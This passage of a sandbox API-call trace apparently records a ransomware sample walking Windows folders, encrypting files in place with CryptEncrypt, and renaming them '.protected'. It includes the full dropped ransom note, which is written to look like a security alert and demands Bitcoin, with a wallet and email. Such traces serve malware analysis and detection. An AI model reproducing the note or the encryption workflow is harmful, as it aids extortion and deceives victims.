Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 79 [0056.658] StrStrW (lpFirst="OWOW32LR.cab", lpSrch=".zip") returned 0x0 [0056.658] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.665] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.665] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.665] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.665] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.671] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.671] CloseHandle (hObject=0xb4) returned 1 [0056.798] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.protected") returned 89 [0056.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.protected")) returned 1 [0056.799] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0056.799] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0056.799] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0056.799] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0056.799] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.799] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.799] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0056.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0056.799] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0056.799] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0056.799] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x93a, lpOverlapped=0x0) returned 1 [0056.841] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.841] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x93a, lpOverlapped=0x0) returned 1 [0056.841] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.841] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.841] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.841] CloseHandle (hObject=0xb4) returned 1 [0056.842] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0056.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0056.842] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0056.842] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0056.842] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0056.842] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0056.843] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0056.843] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0056.843] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0056.843] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0056.844] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0056.844] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0056.844] CloseHandle (hObject=0xa4) returned 1 [0056.844] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0056.844] lstrcmpiW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0056.844] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C") returned 66 [0056.844] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0056.844] lstrcmpW (lpString1="{90140000-0044-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0056.844] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*") returned 68 [0056.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0056.853] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0056.853] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0056.853] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0056.853] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0056.853] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0056.853] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.") returned 68 [0056.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.853] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0056.853] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0056.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.854] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.854] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0056.854] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0056.854] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0056.854] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0056.854] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0056.854] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\..") returned 69 [0056.854] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0056.854] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.854] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0056.854] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0056.854] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0056.854] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="Windows") returned -1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="Program Files") returned -1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="Program Files (x86)") returned -1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="$Recycle.bin") returned 1 [0056.854] lstrcmpiW (lpString1="InfLR.cab", lpString2="System Volume Information") returned -1 [0056.854] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.854] StrStrIW (lpFirst="InfLR.cab", lpSrch=".protected") returned 0x0 [0056.854] lstrcmpW (lpString1="InfLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0056.854] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.854] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.855] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.855] StrStrW (lpFirst="InfLR.cab", lpSrch=".txt") returned 0x0 [0056.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.855] StrStrW (lpFirst="InfLR.cab", lpSrch=".rar") returned 0x0 [0056.855] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 76 [0056.855] StrStrW (lpFirst="InfLR.cab", lpSrch=".zip") returned 0x0 [0056.855] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.899] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.899] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.900] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.900] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.906] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.906] CloseHandle (hObject=0xb4) returned 1 [0056.957] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.protected") returned 86 [0056.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.protected")) returned 1 [0056.957] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Windows") returned -1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Program Files") returned -1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="Program Files (x86)") returned -1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="$Recycle.bin") returned 1 [0056.958] lstrcmpiW (lpString1="InfoPathMUI.msi", lpString2="System Volume Information") returned -1 [0056.958] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrIW (lpFirst="InfoPathMUI.msi", lpSrch=".protected") returned 0x0 [0056.958] lstrcmpW (lpString1="InfoPathMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0056.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.958] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".txt") returned 0x0 [0056.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".rar") returned 0x0 [0056.958] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 82 [0056.958] StrStrW (lpFirst="InfoPathMUI.msi", lpSrch=".zip") returned 0x0 [0056.958] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.972] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.972] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0057.159] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0057.159] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0057.165] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0057.165] CloseHandle (hObject=0xb4) returned 1 [0057.165] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.protected") returned 92 [0057.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.protected")) returned 1 [0057.166] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Windows") returned -1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Program Files") returned -1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="Program Files (x86)") returned -1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="$Recycle.bin") returned 1 [0057.166] lstrcmpiW (lpString1="InfoPathMUI.xml", lpString2="System Volume Information") returned -1 [0057.167] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrIW (lpFirst="InfoPathMUI.xml", lpSrch=".protected") returned 0x0 [0057.167] lstrcmpW (lpString1="InfoPathMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0057.167] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0057.167] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0057.167] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0057.167] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".txt") returned 0x0 [0057.167] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 82 [0057.167] StrStrW (lpFirst="InfoPathMUI.xml", lpSrch=".rar") returned 0x0 [0057.167] 